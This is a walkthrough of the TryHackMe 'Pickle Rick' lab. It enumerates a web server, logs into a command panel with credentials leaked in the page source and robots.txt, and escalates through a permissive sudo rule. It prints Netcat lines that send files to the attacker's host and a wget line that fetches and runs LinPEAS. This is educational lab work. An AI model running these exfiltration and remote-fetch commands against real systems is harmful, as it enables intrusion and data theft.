data:image/s3,"s3://crabby-images/64fd8/64fd8c66a38c8a743273bdd80f9093c005e28537" alt=""
TryHackMe – Pickle Rick Walkthrough
Introduction
This was an easy Rick and Morty-themed Linux challenge that required to exploit a webserver to find 3 ingredients through local enumeration using a web console that will help Rick make his potion to transform himself back into a human from a pickle.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
data:image/s3,"s3://crabby-images/c427a/c427a1b889e4914ec5e48c694ba243bc54943a99" alt=""
The scan has identified two open ports: port 22 (SSH) and port 80 (HTTP), the next step will be to start enumerating HTTP.
Enumerating HTTP
The following page is displayed when accessing the web server through a browser:
data:image/s3,"s3://crabby-images/f5999/f5999dd8501b43bbb820b55285b9534afea64f62" alt=""
When inspecting the source code of the page, a username is revealed:
data:image/s3,"s3://crabby-images/0f52b/0f52b463fae82c415362934ff60d85665927744d" alt=""
The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:
- dir to specify the scan should be done against directories and files
- -u to specify the target URL
- -w to specify the word list to use
- -x to specify the extensions to enumerate
- -t to specify the number of concurrent threads
data:image/s3,"s3://crabby-images/717e7/717e778a16a96e56a9d6911f13952c2908241a4a" alt=""
Gobuster has identified a few interesting entries, one of which is /login.php. When navigating to it a login page is displayed:
data:image/s3,"s3://crabby-images/38c3a/38c3aafb53abcf8aa042608041927dda355f3706" alt=""
When accessing the robots.txt file, a piece of text, which later on turns out to be the password for the user found above, is found:
data:image/s3,"s3://crabby-images/d9c3c/d9c3c144419dafbfa73bbe56f993b48c56ab8c0b" alt=""
Authenticating to the login page using the username and password found earlier:
data:image/s3,"s3://crabby-images/3bbc8/3bbc8dc0ac8b9a6795bbb128b89121d437e054a9" alt=""
This takes to a “Command Panel” page, which allows to run system commands:
data:image/s3,"s3://crabby-images/7d86a/7d86a8976eaefb7d0fc70344d2e3d685b01306b8" alt=""
The next steps will be to try and identify the ingredients required in the challenge.
First Ingredient
Although the portal allows to execute Bash commands, only a limited amount of commands are allowed:
data:image/s3,"s3://crabby-images/37920/379201b6649edd9ebe9d7636fb4f31cdf7c06c91" alt=""
When running ls -la, a “Sup3rS3cretPicl3Ingred.txt” file is found:
data:image/s3,"s3://crabby-images/bda89/bda8930841968b2b7a4fed85836343dbc46eef2f" alt=""
When accessing it through a browser, the first ingredient is displayed:
data:image/s3,"s3://crabby-images/a4f8a/a4f8a8e6ef7a1bc32b8ee008bee5935c5244a0fa" alt=""
Second Ingredient
As seen above, the current folder also contains a “clue.txt” file, which suggests looking around the file system for other ingredients:
data:image/s3,"s3://crabby-images/2b122/2b1221a212e7461c742915cb074f21b2d73e4920" alt=""
Using find to identify the second ingredient file:
find / -name *ingredient* 2>/dev/null
data:image/s3,"s3://crabby-images/fe431/fe4318198e7fb9bacd3384f8b3d5eb2a364414e2" alt=""
A “second ingredients” file is found under /home/rick/second, when executing ls -la against the file it appears that all users can read it:
data:image/s3,"s3://crabby-images/1d273/1d2734886e8f481cfbfdc9d86c6ba13de1c2c31a" alt=""
It appears that commands that allow to read the contents of files such as cat are not allowed:
data:image/s3,"s3://crabby-images/d0fab/d0fab6e9e7efe58c69269054860185184bf700b0" alt=""
Netcat could be used to send the contents of the file to the local Kali host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
data:image/s3,"s3://crabby-images/39821/39821f9c623ed4a85b00aeafb1edce62df6facc4" alt=""
Running the following command to send the contents of the file to the Netcat listener:
nc 10.4.36.186 443 < '/home/rick/second ingredients'
data:image/s3,"s3://crabby-images/c2acc/c2acc3ae4d09f1fe8c18752f9593aab17bc87526" alt=""
The contents of the file containing the second ingredient were received:
data:image/s3,"s3://crabby-images/1a835/1a835cf2a14ac85db52a5577ca79baab465ac382" alt=""
Third Ingredient
Setting up a Python Simple HTTP Server to host the LinPEAS enumeration script:
data:image/s3,"s3://crabby-images/7c004/7c004c6355b3b0303117aa4a888bebe3686fcf3f" alt=""
Executing the following command to download WinPEAS, save it to /tmp and assign execute permissions to it:
wget 10.4.36.186/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
data:image/s3,"s3://crabby-images/afe7d/afe7ddb46c8e028fa5123aa9eecb9b1781b39e54" alt=""
The request was received:
data:image/s3,"s3://crabby-images/c68ee/c68eeffcc3770f1b773c01e13cb2554ce40098e4" alt=""
Using the following command to execute the script and save its output to /tmp/linpeast.xt:
/tmp/linpeas.sh > /tmp/linpeas.txt
data:image/s3,"s3://crabby-images/d6da9/d6da994596fcd1dc14397ed7dd0f9de606984e09" alt=""
Setting a Netcat listener to receive the output of LinPEAS, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
data:image/s3,"s3://crabby-images/c75ad/c75adf720f8d2645332103136ebf3c4baf6d453e" alt=""
Using the following command to send the output of LinPEAS to the Netcat listener:
nc 10.4.36.186 443 < /tmp/linpeas.txt
data:image/s3,"s3://crabby-images/1168a/1168ada9d97506310b910f59c39e299dd9117a5e" alt=""
The output of the script was received on the Netcat listener:
data:image/s3,"s3://crabby-images/9f249/9f249539830da330a9d93101c3d0bfcb7a64cb09" alt=""
It appears that a Sudo rule is present on the machine, that allows the current user to execute all commands as root:
data:image/s3,"s3://crabby-images/ed95b/ed95b6e475231b71891c48c174e96e5011e8ddd8" alt=""
Listing existing files and folders in the /root directory:
sudo ls -la /root/
data:image/s3,"s3://crabby-images/b0d6b/b0d6ba4416838aac905e492a3f73efd87c6f1fca" alt=""
A “3rd.txt” file is found, copying it to the current directory and making it world-readable:
sudo cp /root/3rd.txt /var/www/html/ && chmod 777 3rd.txt
data:image/s3,"s3://crabby-images/c8cdf/c8cdf6108bfdd1b00745b7e778b7947a7d770a89" alt=""
Accessing it through a browser:
data:image/s3,"s3://crabby-images/d82ef/d82ef6e869590d6045d797b94fd8ecf9a7a55943" alt=""
Conclusion
This was an interesting challenge as it was necessary to work around the restrictions of the web console to find and read the ingredients required through alternative commands.